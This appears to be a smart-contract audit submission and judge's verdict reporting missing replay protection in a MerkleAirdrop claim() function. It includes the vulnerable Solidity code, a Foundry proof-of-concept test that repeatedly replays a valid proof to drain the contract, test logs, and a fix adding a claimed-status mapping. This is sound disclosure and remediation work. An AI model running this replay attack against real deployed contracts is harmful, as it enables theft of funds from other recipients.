AirDropper
AI First Flight #5
Beginner FriendlyDeFiFoundry
EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Missing Claim Replay Protection Allows Full Token Drain

1chapeuazul

Root + Impact

Description

  • MerkleAirdrop.claim() is designed to allow each whitelisted account to redeem a one-time token allocation by supplying a valid Merkle proof. However, the function never records that an account has already claimed — there is no hasClaimed mapping or any equivalent state write — so the same (account, amount, merkleProof) tuple can be submitted an unlimited number of times, draining the contract's entire token balance.

function claim(address account, uint256 amount, bytes32[] calldata merkleProof) external payable {
if (msg.value != FEE) {
revert MerkleAirdrop__InvalidFeeAmount();
}
bytes32 leaf = keccak256(bytes.concat(keccak256(abi.encode(account, amount))));
if (!MerkleProof.verify(merkleProof, i_merkleRoot, leaf)) {
revert MerkleAirdrop__InvalidProof();
}
emit Claimed(account, amount);
// @> No "claimed" flag is ever set — every replay passes both checks above
// @> and receives `amount` tokens again
i_airdropToken.safeTransfer(account, amount);
}

Risk

Likelihood: High

  • Any whitelisted account possesses a permanently valid proof; replaying it requires no additional privileges, approvals, or external conditions — only the 1 Gwei fee per call.

  • The attack is profitable the moment amount > FEE (in token value), which is true for every realistic airdrop deployment, and can be scripted to loop until the contract balance reaches zero in a single transaction.

Impact: High

  • The entire airdrop token reserve is drainable by a single whitelisted address, completely denying all other recipients their allocated tokens.

  • Protocol reputation and user trust are irreparably damaged; there is no on-chain recovery path once the balance is drained.

Proof of Concept

// SPDX-License-Identifier: MIT
pragma solidity 0.8.24;
import { Test, console2 } from "forge-std/Test.sol";
import { MerkleAirdrop } from "../src/MerkleAirdrop.sol";
import { ERC20Mock } from "@openzeppelin/contracts/mocks/token/ERC20Mock.sol";
import { Merkle } from "murky/src/Merkle.sol";
/// @title MerkleAirdrop_H1_ClaimReplay_PoC
/// @notice Demonstrates that claim() carries no replay protection: a single
/// whitelisted account can call claim() in a loop and drain the entire
/// airdrop reserve.
/// @dev Setup: two-leaf Merkle tree with ALICE (25 tokens) and BOB (25 tokens).
/// Contract is funded with 100 tokens so multiple victims exist.
/// Attack: ALICE replays her valid proof four times, receiving 100 tokens
/// in total while BOB (and any other recipient) is left with nothing.
contract MerkleAirdrop_H1_ClaimReplay_PoC is Test {
/*//////////////////////////////////////////////////////////////
CONSTANTS
//////////////////////////////////////////////////////////////*/
uint256 private constant ALICE_AMOUNT = 25e18;
uint256 private constant TOTAL_SUPPLY = 100e18;
uint256 private constant FEE = 1e9; // matches MerkleAirdrop.FEE
uint256 private constant REPLAY_TIMES = 4; // drains the full reserve
/*//////////////////////////////////////////////////////////////
STATE
//////////////////////////////////////////////////////////////*/
MerkleAirdrop private airdrop;
ERC20Mock private token;
address private ALICE = makeAddr("alice");
address private BOB = makeAddr("bob");
bytes32 private merkleRoot;
bytes32[] private aliceProof;
/*//////////////////////////////////////////////////////////////
SETUP
//////////////////////////////////////////////////////////////*/
function setUp() public {
token = new ERC20Mock();
// Build a two-leaf Merkle tree: [ALICE, 25e18] and [BOB, 25e18]
Merkle m = new Merkle();
bytes32[] memory leaves = new bytes32[](2);
leaves[0] = keccak256(bytes.concat(keccak256(abi.encode(ALICE, ALICE_AMOUNT))));
leaves[1] = keccak256(bytes.concat(keccak256(abi.encode(BOB, ALICE_AMOUNT))));
merkleRoot = m.getRoot(leaves);
aliceProof = m.getProof(leaves, 0); // proof for leaf index 0 (ALICE)
// Deploy airdrop and fund it with 100 tokens (4× ALICE's allocation)
airdrop = new MerkleAirdrop(merkleRoot, token);
token.mint(address(airdrop), TOTAL_SUPPLY);
// Give ALICE enough ETH to pay the fee on every replay
vm.deal(ALICE, FEE * REPLAY_TIMES);
}
/*//////////////////////////////////////////////////////////////
POC
//////////////////////////////////////////////////////////////*/
/// @notice ALICE replays her proof REPLAY_TIMES times, draining the full reserve.
function test_H1_ClaimReplay_DrainFullReserve() public {
uint256 contractBalanceBefore = token.balanceOf(address(airdrop));
uint256 aliceBalanceBefore = token.balanceOf(ALICE);
console2.log("=== Before attack ===");
console2.log("Contract token balance : ", contractBalanceBefore);
console2.log("Alice token balance : ", aliceBalanceBefore);
// ALICE replays her valid proof in a loop
vm.startPrank(ALICE);
for (uint256 i = 0; i < REPLAY_TIMES; i++) {
airdrop.claim{ value: FEE }(ALICE, ALICE_AMOUNT, aliceProof);
}
vm.stopPrank();
uint256 contractBalanceAfter = token.balanceOf(address(airdrop));
uint256 aliceBalanceAfter = token.balanceOf(ALICE);
console2.log("=== After attack ===");
console2.log("Contract token balance : ", contractBalanceAfter);
console2.log("Alice token balance : ", aliceBalanceAfter);
// Contract is fully drained
assertEq(contractBalanceAfter, 0, "Airdrop contract should be empty");
// ALICE holds the entire reserve
assertEq(aliceBalanceAfter, TOTAL_SUPPLY, "Alice should hold the full supply");
}
}

Results

forge test --match-test test_H1_ClaimReplay_DrainFullReserve -vvv
[⠒] Compiling...
No files changed, compilation skipped
Ran 1 test for test/test.t.sol:MerkleAirdrop_H1_ClaimReplay_PoC
[PASS] test_H1_ClaimReplay_DrainFullReserve() (gas: 132167)
Logs:
=== Before attack ===
Contract token balance : 100000000000000000000
Alice token balance : 0
=== After attack ===
Contract token balance : 0
Alice token balance : 100000000000000000000
Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 1.72ms (562.48µs CPU time)

Recommended Mitigation

Track claimed status per account and revert on any replay attempt.

+ error MerkleAirdrop__AlreadyClaimed();
+ mapping(address => bool) private s_hasClaimed;
function claim(address account, uint256 amount, bytes32[] calldata merkleProof) external payable {
if (msg.value != FEE) {
revert MerkleAirdrop__InvalidFeeAmount();
}
+ if (s_hasClaimed[account]) {
+ revert MerkleAirdrop__AlreadyClaimed();
+ }
bytes32 leaf = keccak256(bytes.concat(keccak256(abi.encode(account, amount))));
if (!MerkleProof.verify(merkleProof, i_merkleRoot, leaf)) {
revert MerkleAirdrop__InvalidProof();
}
+ s_hasClaimed[account] = true;
emit Claimed(account, amount);
i_airdropToken.safeTransfer(account, amount);
}
Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 6 hours ago
Submission Judgement Published
Validated
Assigned finding tags:

[H-02] Eligible users can claim their airdrop amounts over and over again, draining the contract

## Description A user eligible for the airdrop can verify themselves as being part of the merkle tree and claim their airdrop amount. However, there is no mechanism enabled to track the users who have already claimed their airdrop, and the merkle tree is still composed of the same user. This allows users to drain the `MerkleAirdrop` contract by calling the `MerkleAirdrop::claim()` function over and over again. ## Impact **Severity: High**<br/>**Likelihood: High** A malicious user can call the `MerkleAirdrop::claim()` function over and over again until the contract is drained of all its funds. This also means that other users won't be able to claim their airdrop amounts. ## Proof of Code Add the following test to `./test/MerkleAirdrop.t.sol`, ```javascript function testClaimAirdropOverAndOverAgain() public { vm.deal(collectorOne, airdrop.getFee() * 4); for (uint8 i = 0; i < 4; i++) { vm.prank(collectorOne); airdrop.claim{ value: airdrop.getFee() }(collectorOne, amountToCollect, proof); } assertEq(token.balanceOf(collectorOne), 100e6); } ``` The test passes, and the malicious user has drained the contract of all its funds. ## Recommended Mitigation Use a mapping to store the addresses that have claimed their airdrop amounts. Check and update this mapping each time a user tries to claim their airdrop amount. ```diff contract MerkleAirdrop is Ownable { using SafeERC20 for IERC20; error MerkleAirdrop__InvalidFeeAmount(); error MerkleAirdrop__InvalidProof(); error MerkleAirdrop__TransferFailed(); + error MerkleAirdrop__AlreadyClaimed(); uint256 private constant FEE = 1e9; IERC20 private immutable i_airdropToken; bytes32 private immutable i_merkleRoot; + mapping(address user => bool claimed) private s_hasClaimed; ... function claim(address account, uint256 amount, bytes32[] calldata merkleProof) external payable { + if (s_hasClaimed[account]) revert MerkleAirdrop__AlreadyClaimed(); if (msg.value != FEE) { revert MerkleAirdrop__InvalidFeeAmount(); } bytes32 leaf = keccak256(bytes.concat(keccak256(abi.encode(account, amount)))); if (!MerkleProof.verify(merkleProof, i_merkleRoot, leaf)) { revert MerkleAirdrop__InvalidProof(); } + s_hasClaimed[account] = true; emit Claimed(account, amount); i_airdropToken.safeTransfer(account, amount); } ``` Now, let's unit test the changes, ```javascript function testCannotClaimAirdropMoreThanOnceAnymore() public { vm.deal(collectorOne, airdrop.getFee() * 2); vm.prank(collectorOne); airdrop.claim{ value: airdrop.getFee() }(collectorOne, amountToCollect, proof); vm.prank(collectorOne); airdrop.claim{ value: airdrop.getFee() }(collectorOne, amountToCollect, proof); } ``` The test correctly fails, with the following logs, ```shell Failing tests: Encountered 1 failing test in test/MerkleAirdropTest.t.sol:MerkleAirdropTest [FAIL. Reason: MerkleAirdrop__AlreadyClaimed()] testCannotClaimAirdropMoreThanOnceAnymore() (gas: 96751) ```

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!